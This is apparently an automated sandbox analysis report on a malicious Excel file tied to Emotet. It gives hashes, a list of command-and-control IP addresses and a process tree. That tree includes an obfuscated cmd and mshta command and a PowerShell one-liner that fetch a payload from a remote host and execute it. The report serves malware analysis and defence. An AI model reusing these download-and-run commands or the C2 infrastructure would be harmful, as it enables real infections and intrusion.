Analysis
max time kernel: 121s
max time network: 149s
platform: windows10_x64
resource: win10-en-20211208
submitted: 28-01-2022 02:31
Behavioral task: behavioral1
Sample: EHZ816141086RS.xls
Resource: win7-en-20211208
General
Target: EHZ816141086RS.xls
Size: 47KB
MD5: b297dd00c8d7b450371f60b877a4e4a0
SHA1: 95e435fcfff850f3a176f43517344101c6eee845
SHA256: d3555d24f820403e1e49c53898a3c54f58077c83bd4738ad9a0e2210d457baae
SHA512: a4a84bc4784c0461a712622db68524a4a3eb5da176b4d1b18c87fcb65c6bc33498fad801e4803aa53f7ac00bb724bfcd1899710f27c497936eec0c5f54750317
Malware Config
Extracted: http://91.240.118.168/vvv/ppp/fe.html
Extracted: http://91.240.118.168/vvv/ppp/fe.png
Extracted: emotet (Epoch4) C2 addresses:
51.15.4.22:443
173.214.173.220:8080
212.237.5.209:443
192.254.71.210:443
216.158.226.206:443
162.243.175.63:443
212.24.98.99:8080
58.227.42.236:80
45.118.115.99:8080
104.251.214.46:8080
185.157.82.209:8080
46.55.222.11:443
188.40.137.206:8080
81.0.236.90:443
103.75.201.2:443
129.232.188.93:443
195.154.133.20:443
159.8.59.82:8080
79.172.212.216:8080
138.185.72.26:8080
200.17.134.35:7080
185.157.82.211:8080
209.59.138.75:7080
178.63.25.185:443
45.176.232.124:443
45.118.135.203:7080
164.68.99.3:8080
203.114.109.124:443
212.237.17.99:8080
50.116.54.215:443
131.100.24.231:80
212.237.56.116:7080
45.142.114.231:8080
162.214.50.39:7080
51.38.71.0:443
104.168.155.129:8080
107.182.225.142:8080
217.182.143.207:443
158.69.222.101:443
176.104.106.96:8080
207.38.84.195:8080
41.76.108.46:8080
110.232.117.186:8080
178.79.147.66:8080
173.212.193.249:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 1292 | 2732 | CMD.EXE | EXCEL.EXE
-
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
Processes:
flow | pid | process
30 | 1184 | mshta.exe
38 | 1788 | powershell.exe
40 | 1788 | powershell.exe
47 | 2448 | rundll32.exe
48 | 2448 | rundll32.exe
-
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
pid | process
1596 | rundll32.exe
2208 | rundll32.exe
-
Drops file in System32 directory 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\Nifktanavwovxcda\zmnio.puq | rundll32.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
pid | pid_target | process | target process
4012 | 1184 | WerFault.exe | mshta.exe
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
2732 | EXCEL.EXE
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
pid | process
1788 | powershell.exe (3 entries)
4012 | WerFault.exe (14 entries)
2448 | rundll32.exe (2 entries)
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 1788 | powershell.exe
Token: SeDebugPrivilege | 4012 | WerFault.exe
-
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
pid | process
2732 | EXCEL.EXE (13 entries)
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
description | pid | process | target process
PID 2732 wrote to memory of 1292 | 2732 | EXCEL.EXE | CMD.EXE (2 entries)
PID 1292 wrote to memory of 1184 | 1292 | CMD.EXE | mshta.exe (2 entries)
PID 1184 wrote to memory of 1788 | 1184 | mshta.exe | powershell.exe (2 entries)
PID 1788 wrote to memory of 1368 | 1788 | powershell.exe | cmd.exe (2 entries)
PID 1368 wrote to memory of 1596 | 1368 | cmd.exe | rundll32.exe (3 entries)
PID 1596 wrote to memory of 2208 | 1596 | rundll32.exe | rundll32.exe (3 entries)
PID 2208 wrote to memory of 1632 | 2208 | rundll32.exe | rundll32.exe (3 entries)
PID 1632 wrote to memory of 2448 | 1632 | rundll32.exe | rundll32.exe (3 entries)
Processes
-
(tree level 1) C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\EHZ816141086RS.xls"
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
(tree level 2) C:\Windows\SYSTEM32\CMD.EXE
Command line: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
(tree level 3) C:\Windows\system32\mshta.exe
Command line: mshta http://91.240.118.168/vvv/ppp/fe.html
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
(tree level 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
(tree level 5) C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
- Suspicious use of WriteProcessMemory
-
(tree level 6) C:\Windows\SysWow64\rundll32.exe
Command line: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
(tree level 7) C:\Windows\SysWOW64\rundll32.exe
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
(tree level 8) C:\Windows\SysWOW64\rundll32.exe
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nifktanavwovxcda\zmnio.puq",LkVHpq
- Suspicious use of WriteProcessMemory
-
(tree level 9) C:\Windows\SysWOW64\rundll32.exe
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Nifktanavwovxcda\zmnio.puq",DllRegisterServer
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
(tree level 4, child of mshta.exe pid 1184) C:\Windows\system32\WerFault.exe
Command line: C:\Windows\system32\WerFault.exe -u -p 1184 -s 1644
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\QWER.dll
MD5: 4739fcdd312a0287b93fe1e968b2aafe
SHA1: f2aa748a0bf5f52e1919cb3b9e24ed5b65701a71
SHA256: b7d873fd9a5c897cd22f36869f7c2fa335de5b14c898c86511c4bc7c7e0f2748
SHA512: 32a120e8170a09dd5313f057c9095cc49d57314b482e1f072ace7bdcf7c2c9d9574bb3a8ca6ba2ec8b729160051d5a7d393fcdb8c31455b022a5f4fe25247f76
-
\ProgramData\QWER.dll
MD5: 4739fcdd312a0287b93fe1e968b2aafe
SHA1: f2aa748a0bf5f52e1919cb3b9e24ed5b65701a71
SHA256: b7d873fd9a5c897cd22f36869f7c2fa335de5b14c898c86511c4bc7c7e0f2748
SHA512: 32a120e8170a09dd5313f057c9095cc49d57314b482e1f072ace7bdcf7c2c9d9574bb3a8ca6ba2ec8b729160051d5a7d393fcdb8c31455b022a5f4fe25247f76
-
- memory/1788-277-0x0000016A229D0000-0x0000016A229F2000-memory.dmp  Filesize: 136KB
- memory/1788-315-0x0000016A3AD43000-0x0000016A3AD45000-memory.dmp  Filesize: 8KB
- memory/1788-403-0x0000016A3AD46000-0x0000016A3AD48000-memory.dmp  Filesize: 8KB
- memory/1788-329-0x0000016A3B360000-0x0000016A3B3D6000-memory.dmp  Filesize: 472KB
- memory/1788-311-0x0000016A3AD40000-0x0000016A3AD42000-memory.dmp  Filesize: 8KB
- memory/1788-298-0x0000016A3ACE0000-0x0000016A3AD1C000-memory.dmp  Filesize: 240KB
- memory/2208-598-0x00000000048B0000-0x00000000048D5000-memory.dmp  Filesize: 148KB
- memory/2208-611-0x0000000005370000-0x0000000005395000-memory.dmp  Filesize: 148KB
- memory/2208-609-0x00000000051D0000-0x00000000051F5000-memory.dmp  Filesize: 148KB
- memory/2208-607-0x0000000005170000-0x0000000005195000-memory.dmp  Filesize: 148KB
- memory/2208-605-0x0000000005110000-0x0000000005135000-memory.dmp  Filesize: 148KB
- memory/2208-603-0x0000000004FB0000-0x0000000004FD5000-memory.dmp  Filesize: 148KB
- memory/2208-601-0x0000000004DE0000-0x0000000004E05000-memory.dmp  Filesize: 148KB
- memory/2448-617-0x0000000003480000-0x00000000034A5000-memory.dmp  Filesize: 148KB
- memory/2448-619-0x0000000004E80000-0x0000000004EA5000-memory.dmp  Filesize: 148KB
- memory/2732-115-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp  Filesize: 64KB
- memory/2732-118-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp  Filesize: 64KB
- memory/2732-128-0x00007FFD76670000-0x00007FFD76680000-memory.dmp  Filesize: 64KB
- memory/2732-129-0x00007FFD76670000-0x00007FFD76680000-memory.dmp  Filesize: 64KB
- memory/2732-121-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp  Filesize: 64KB
- memory/2732-117-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp  Filesize: 64KB
- memory/2732-116-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp  Filesize: 64KB
- memory/2732-663-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp  Filesize: 64KB
- memory/2732-664-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp  Filesize: 64KB
- memory/2732-666-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp  Filesize: 64KB
- memory/2732-665-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmp  Filesize: 64KB